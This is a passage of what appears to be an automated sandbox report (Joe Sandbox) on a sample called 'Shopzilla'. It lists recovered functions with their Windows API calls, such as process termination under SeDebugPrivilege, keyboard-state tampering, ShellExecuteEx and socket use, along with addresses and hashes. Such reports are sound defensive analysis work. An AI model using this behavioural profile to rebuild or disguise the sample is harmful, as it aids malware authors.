                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window_wcscat
                                              • String ID: SysListView32
                                              • API String ID: 307300125-78025650
                                              • Opcode ID: 0bb706e64ed558fd3623f341a5f1d00715e9e1337090d25c7a196fd4975641eb
                                              • Instruction ID: eb2e13f07d1e8915ec7612d3b9d6caef91daa0be3b0e708a2e783195adf31cc0
                                              • Opcode Fuzzy Hash: 0bb706e64ed558fd3623f341a5f1d00715e9e1337090d25c7a196fd4975641eb
                                              • Instruction Fuzzy Hash: A741C171904318EFEB21DFA4DC85BEE77F8EF08350F10056AF998A6591D6719D848B50
                                              APIs
                                                • Part of subcall function 00C03FB5: CreateToolhelp32Snapshot.KERNEL32 ref: 00C03FDA
                                                • Part of subcall function 00C03FB5: Process32FirstW.KERNEL32(00000000,?), ref: 00C03FE8
                                                • Part of subcall function 00C03FB5: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00C040B2
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C1EE55
                                              • GetLastError.KERNEL32 ref: 00C1EE68
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C1EE97
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C1EF14
                                              • GetLastError.KERNEL32(00000000), ref: 00C1EF1F
                                              • CloseHandle.KERNEL32(00000000), ref: 00C1EF54
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 1701285019-2896544425
                                              • Opcode ID: 902e134403c8cc6c6b555b5536639c67e76a75a9e592b941f4b3d763379b0902
                                              • Instruction ID: b68d8231249793135a655e11dfb417c6b6b0b79dd0bc380abedd6cf69a0e3ea7
                                              • Opcode Fuzzy Hash: 902e134403c8cc6c6b555b5536639c67e76a75a9e592b941f4b3d763379b0902
                                              • Instruction Fuzzy Hash: B841BB312042059FCB11EF64DC95FAEB7E1AF86310F148098FD429B2D2CBB1AD89DB81
                                              APIs
                                              • LoadIconW.USER32(00000000,00007F03), ref: 00C033E9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: IconLoad
                                              • String ID: blank$info$question$stop$warning
                                              • API String ID: 2457776203-404129466
                                              • Opcode ID: cc6c8ec69aab1b2b972e9720b8ec4bf914d536acc90ab0dbddec6effe65dd6a4
                                              • Instruction ID: 65f77fdf08ebad4df9197c196ed33d3efcd66faf80aa9975902e0976e474e4f5
                                              • Opcode Fuzzy Hash: cc6c8ec69aab1b2b972e9720b8ec4bf914d536acc90ab0dbddec6effe65dd6a4
                                              • Instruction Fuzzy Hash: 9E115B36348746FAE7024B559C82EAA37DCDF15721B60406EFA049A1D2EAB99F818168
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C0466F
                                              • LoadStringW.USER32(00000000), ref: 00C04676
                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C0468C
                                              • LoadStringW.USER32(00000000), ref: 00C04693
                                              • _wprintf.LIBCMT ref: 00C046B9
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C046D7
                                              Strings
                                              • %s (%d) : ==> %s: %s %s, xrefs: 00C046B4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message_wprintf
                                              • String ID: %s (%d) : ==> %s: %s %s
                                              • API String ID: 3648134473-3128320259
                                              • Opcode ID: 618eb76eed915b267a00387614ac650b1cd7f5e6c491b776696dbb8f632ccd1a
                                              • Instruction ID: b79c66a7f5001090eac7cbb5a16cb8a5ad4b95837f79d18ecb35869676503fe7
                                              • Opcode Fuzzy Hash: 618eb76eed915b267a00387614ac650b1cd7f5e6c491b776696dbb8f632ccd1a
                                              • Instruction Fuzzy Hash: 970162F79543087FE711A7909D89FFB776CE708301F5005A5BB45D2041EA745E848B75
                                              APIs
                                                • Part of subcall function 00BA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BA29F3
                                              • GetSystemMetrics.USER32(0000000F), ref: 00C2D89F
                                              • GetSystemMetrics.USER32(0000000F), ref: 00C2D8BF
                                              • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C2DAFA
                                              • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C2DB18
                                              • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C2DB39
                                              • ShowWindow.USER32(00000003,00000000), ref: 00C2DB58
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00C2DB7D
                                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00C2DBA0
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                              • String ID:
                                              • API String ID: 1211466189-0
                                              • Opcode ID: b8c49daebd988194cadf6554cb531e89358fc63fcb6f6f2b3f8e6fcd46f48fd8
                                              • Instruction ID: 510386824893fb676056e778655a39c6f758c628a92d880385a8b391e6815211
                                              • Opcode Fuzzy Hash: b8c49daebd988194cadf6554cb531e89358fc63fcb6f6f2b3f8e6fcd46f48fd8
                                              • Instruction Fuzzy Hash: 95B1DE31600225EFCF14CF69D9D5BAD7BB1FF14711F088069EC5A9B699D730AA90CB90
                                              APIs
                                                • Part of subcall function 00BB1A36: _memmove.LIBCMT ref: 00BB1A77
                                                • Part of subcall function 00C21242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C201D5,?,?), ref: 00C21259
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C20216
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: BuffCharConnectRegistryUpper_memmove
                                              • String ID:
                                              • API String ID: 3479070676-0
                                              • Opcode ID: cc3e1804c015c34e681cfabf11391c60d03bfea3577af4f4f9808f8c4d972e11
                                              • Instruction ID: f96393416131398d2443c0b4b2bae6b5bb9bc7d26c9e3e26b83907ba4c93ed0f
                                              • Opcode Fuzzy Hash: cc3e1804c015c34e681cfabf11391c60d03bfea3577af4f4f9808f8c4d972e11
                                              • Instruction Fuzzy Hash: 70A1CC302042159FCB14EF14D891B7EBBE5EF84310F24895EF9A69B2A2DB70ED45CB42
                                              APIs
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00BDC438,00000004,00000000,00000000,00000000), ref: 00BA2E9F
                                              • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00BDC438,00000004,00000000,00000000,00000000,000000FF), ref: 00BA2EE7
                                              • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00BDC438,00000004,00000000,00000000,00000000), ref: 00BDC48B
                                              • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00BDC438,00000004,00000000,00000000,00000000), ref: 00BDC4F7
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: ShowWindow
                                              • String ID:
                                              • API String ID: 1268545403-0
                                              • Opcode ID: 8173a816ea4784332bc345c7d87fa7570ba6dde9dafa55598e423f4a2eb6bf80
                                              • Instruction ID: bd3dd2d3cc98a725abe9e17bfb7d66360ae5427b947f8d512431838e7f34a227
                                              • Opcode Fuzzy Hash: 8173a816ea4784332bc345c7d87fa7570ba6dde9dafa55598e423f4a2eb6bf80
                                              • Instruction Fuzzy Hash: 2141F43560C6819AD7398B2CC9D877ABBD2EB87300F2484CEE84746BA1D771A8C1DB51
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C07505
                                                • Part of subcall function 00BC0F16: std::exception::exception.LIBCMT ref: 00BC0F4C
                                                • Part of subcall function 00BC0F16: __CxxThrowException@8.LIBCMT ref: 00BC0F61
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C0753C
                                              • EnterCriticalSection.KERNEL32(?), ref: 00C07558
                                              • _memmove.LIBCMT ref: 00C075A6
                                              • _memmove.LIBCMT ref: 00C075C3
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00C075D2
                                              • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C075E7
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C07606
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                              • String ID:
                                              • API String ID: 256516436-0
                                              • Opcode ID: 06946b482b1d0ee689c54b28d0c178da9ef160cf09e50f92cb4aa3cf2e712dd5
                                              • Instruction ID: 70562ed85e68ff469dde42a35e9a63981e0d738f42fe62b2f22b0e90a2ef2cd5
                                              • Opcode Fuzzy Hash: 06946b482b1d0ee689c54b28d0c178da9ef160cf09e50f92cb4aa3cf2e712dd5
                                              • Instruction Fuzzy Hash: D9318132914205EBCB10EF54DC85FAFB7B8EF45310F2481A9F904AB256D7709A54DBA0
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00C265D8
                                              • GetDC.USER32(00000000), ref: 00C265E0
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C265EB
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00C265F7
                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C26633
                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C26644
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C29417,?,?,000000FF,00000000,?,000000FF,?), ref: 00C2667E
                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C2669E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                              • String ID:
                                              • API String ID: 3864802216-0
                                              • Opcode ID: 3682ae5cd23d198aa357a8cfcc21422ec049753915705c3b60b2593471f79f1a
                                              • Instruction ID: 93286ce4f7412532588bfa2499fabd2ff9e5b34020e01033c4f8eb9211470cda
                                              • Opcode Fuzzy Hash: 3682ae5cd23d198aa357a8cfcc21422ec049753915705c3b60b2593471f79f1a
                                              • Instruction Fuzzy Hash: E7318B72111224BFEF158F10DC8AFEA3FA9EF49761F040051FE08AA291C6759C51CBB4
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: 4bfc072be6408b4ceee9a435accbd4f8363d392adec4896bccfbf39dc1ecd8a8
                                              • Instruction ID: 39c5a9b607500169b184930b1662e777a5510b2bf3bc800cc50568b19c3b0e19
                                              • Opcode Fuzzy Hash: 4bfc072be6408b4ceee9a435accbd4f8363d392adec4896bccfbf39dc1ecd8a8
                                              • Instruction Fuzzy Hash: 4921D761A1410D7B9600A5189F83FBB3BDCEEA1784F0040E6FE06E7243F755EF5982A5
                                              APIs
                                                • Part of subcall function 00BA4D37: __itow.LIBCMT ref: 00BA4D62
                                                • Part of subcall function 00BA4D37: __swprintf.LIBCMT ref: 00BA4DAC
                                                • Part of subcall function 00BB436A: _wcscpy.LIBCMT ref: 00BB438D
                                              • _wcstok.LIBCMT ref: 00C0F144
                                              • _wcscpy.LIBCMT ref: 00C0F1D3
                                              • _memset.LIBCMT ref: 00C0F206
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                              • String ID: X
                                              • API String ID: 774024439-3081909835
                                              • Opcode ID: c5a1b3d37b89e16d76311a2439524c72c1559f4bf74e015cc7f5f77b1be44421
                                              • Instruction ID: 8a44d4ff3efa340da9fae3d9460ae92f5528a976b0d8fcc8bc84c8ce781f4783
                                              • Opcode Fuzzy Hash: c5a1b3d37b89e16d76311a2439524c72c1559f4bf74e015cc7f5f77b1be44421
                                              • Instruction Fuzzy Hash: 0BC18E715083409FD724EF28C855AAEB7E4FF85310F10496DF899972A2DB70ED86CB92
                                              APIs
                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C170B0
                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C170D1
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00C170E4
                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 00C1719A
                                              • inet_ntoa.WSOCK32(?), ref: 00C17157
                                                • Part of subcall function 00BFB2CD: _strlen.LIBCMT ref: 00BFB2D7
                                                • Part of subcall function 00BFB2CD: _memmove.LIBCMT ref: 00BFB2F9
                                              • _strlen.LIBCMT ref: 00C171F4
                                              • _memmove.LIBCMT ref: 00C1725D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                              • String ID:
                                              • API String ID: 3619996494-0
                                              • Opcode ID: c9e8b439a3afcd27cd62f61966f434d4df0c7b9d301bdba00ef09a32d59cd268
                                              • Instruction ID: dd07d90cca7c038c78f8d79e059b9730db5bd9d419cafe4cf8ae68b2f175f82e
                                              • Opcode Fuzzy Hash: c9e8b439a3afcd27cd62f61966f434d4df0c7b9d301bdba00ef09a32d59cd268
                                              • Instruction Fuzzy Hash: 8081D171208300ABC320EB24DC91FAFB7F8AF86714F104A5CF5569B292DB70AE45DB91
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 790a2df7f54a43e4005caddccd275e20a86d6dd2e6653fb4300250f84fbb1806
                                              • Instruction ID: 8a8abf9781e8fd046bdd0f56b03326ff3e1b0ef7a4f5837315fce38e11c0e302
                                              • Opcode Fuzzy Hash: 790a2df7f54a43e4005caddccd275e20a86d6dd2e6653fb4300250f84fbb1806
                                              • Instruction Fuzzy Hash: CB717D31904109EFCB45CF98CC89EBEBBB9FF86314F248599F915AB251C7349A51CBA0
                                              APIs
                                              • IsWindow.USER32(00D356E0), ref: 00C2B7D8
                                              • IsWindowEnabled.USER32(00D356E0), ref: 00C2B7E4
                                              • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00C2B8C8
                                              • SendMessageW.USER32(00D356E0,000000B0,?,?), ref: 00C2B8FF
                                              • IsDlgButtonChecked.USER32(?,?), ref: 00C2B93C
                                              • GetWindowLongW.USER32(00D356E0,000000EC), ref: 00C2B95E
                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C2B976
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                              • String ID:
                                              • API String ID: 4072528602-0
                                              • Opcode ID: c012b3b2145f3b499ffc76bcc95a5875334ef529272f2446f13d59fab8229b1e
                                              • Instruction ID: e282acacbd7a23fb07196e92e6476a160f064fb20eaf52c3456a42edb65ad25e
                                              • Opcode Fuzzy Hash: c012b3b2145f3b499ffc76bcc95a5875334ef529272f2446f13d59fab8229b1e
                                              • Instruction Fuzzy Hash: 9D71BE74A00224AFEB20DF64E8D5FAA7BB9FF49300F144059F969937A1C731AE50DB60
                                              APIs
                                              • _memset.LIBCMT ref: 00C1F8F9
                                              • _memset.LIBCMT ref: 00C1F9C2
                                              • ShellExecuteExW.SHELL32(?), ref: 00C1FA07
                                                • Part of subcall function 00BA4D37: __itow.LIBCMT ref: 00BA4D62
                                                • Part of subcall function 00BA4D37: __swprintf.LIBCMT ref: 00BA4DAC
                                                • Part of subcall function 00BB436A: _wcscpy.LIBCMT ref: 00BB438D
                                              • GetProcessId.KERNEL32(00000000), ref: 00C1FA7E
                                              • CloseHandle.KERNEL32(00000000), ref: 00C1FAAD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                              • String ID: @
                                              • API String ID: 3522835683-2766056989
                                              • Opcode ID: e04babf44e954f7eaffbd8401198a0823365a2ec5a837a3ff38276e90c552db7
                                              • Instruction ID: def6ffc554a5f7ca6f94216663dd33b191d4b9daa50e401287959da90c142cd2
                                              • Opcode Fuzzy Hash: e04babf44e954f7eaffbd8401198a0823365a2ec5a837a3ff38276e90c552db7
                                              • Instruction Fuzzy Hash: 3761C075A00619DFCB14EF54C480AAEB7F5FF49310F1481ADE859AB351CB70AE82CB90
                                              APIs
                                              • GetParent.USER32(?), ref: 00C015F7
                                              • GetKeyboardState.USER32(?), ref: 00C0160C
                                              • SetKeyboardState.USER32(?), ref: 00C0166D
                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00C0169B
                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00C016BA
                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00C01700
                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C01723
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 905bbc36b9a620275f6285eefb96941e868ab46cca34344a1eb65a779427caed
                                              • Instruction ID: af078dd45ef2967e9882ea5c64dbe24380ea1b3bc6434a741086de1144732393
                                              • Opcode Fuzzy Hash: 905bbc36b9a620275f6285eefb96941e868ab46cca34344a1eb65a779427caed
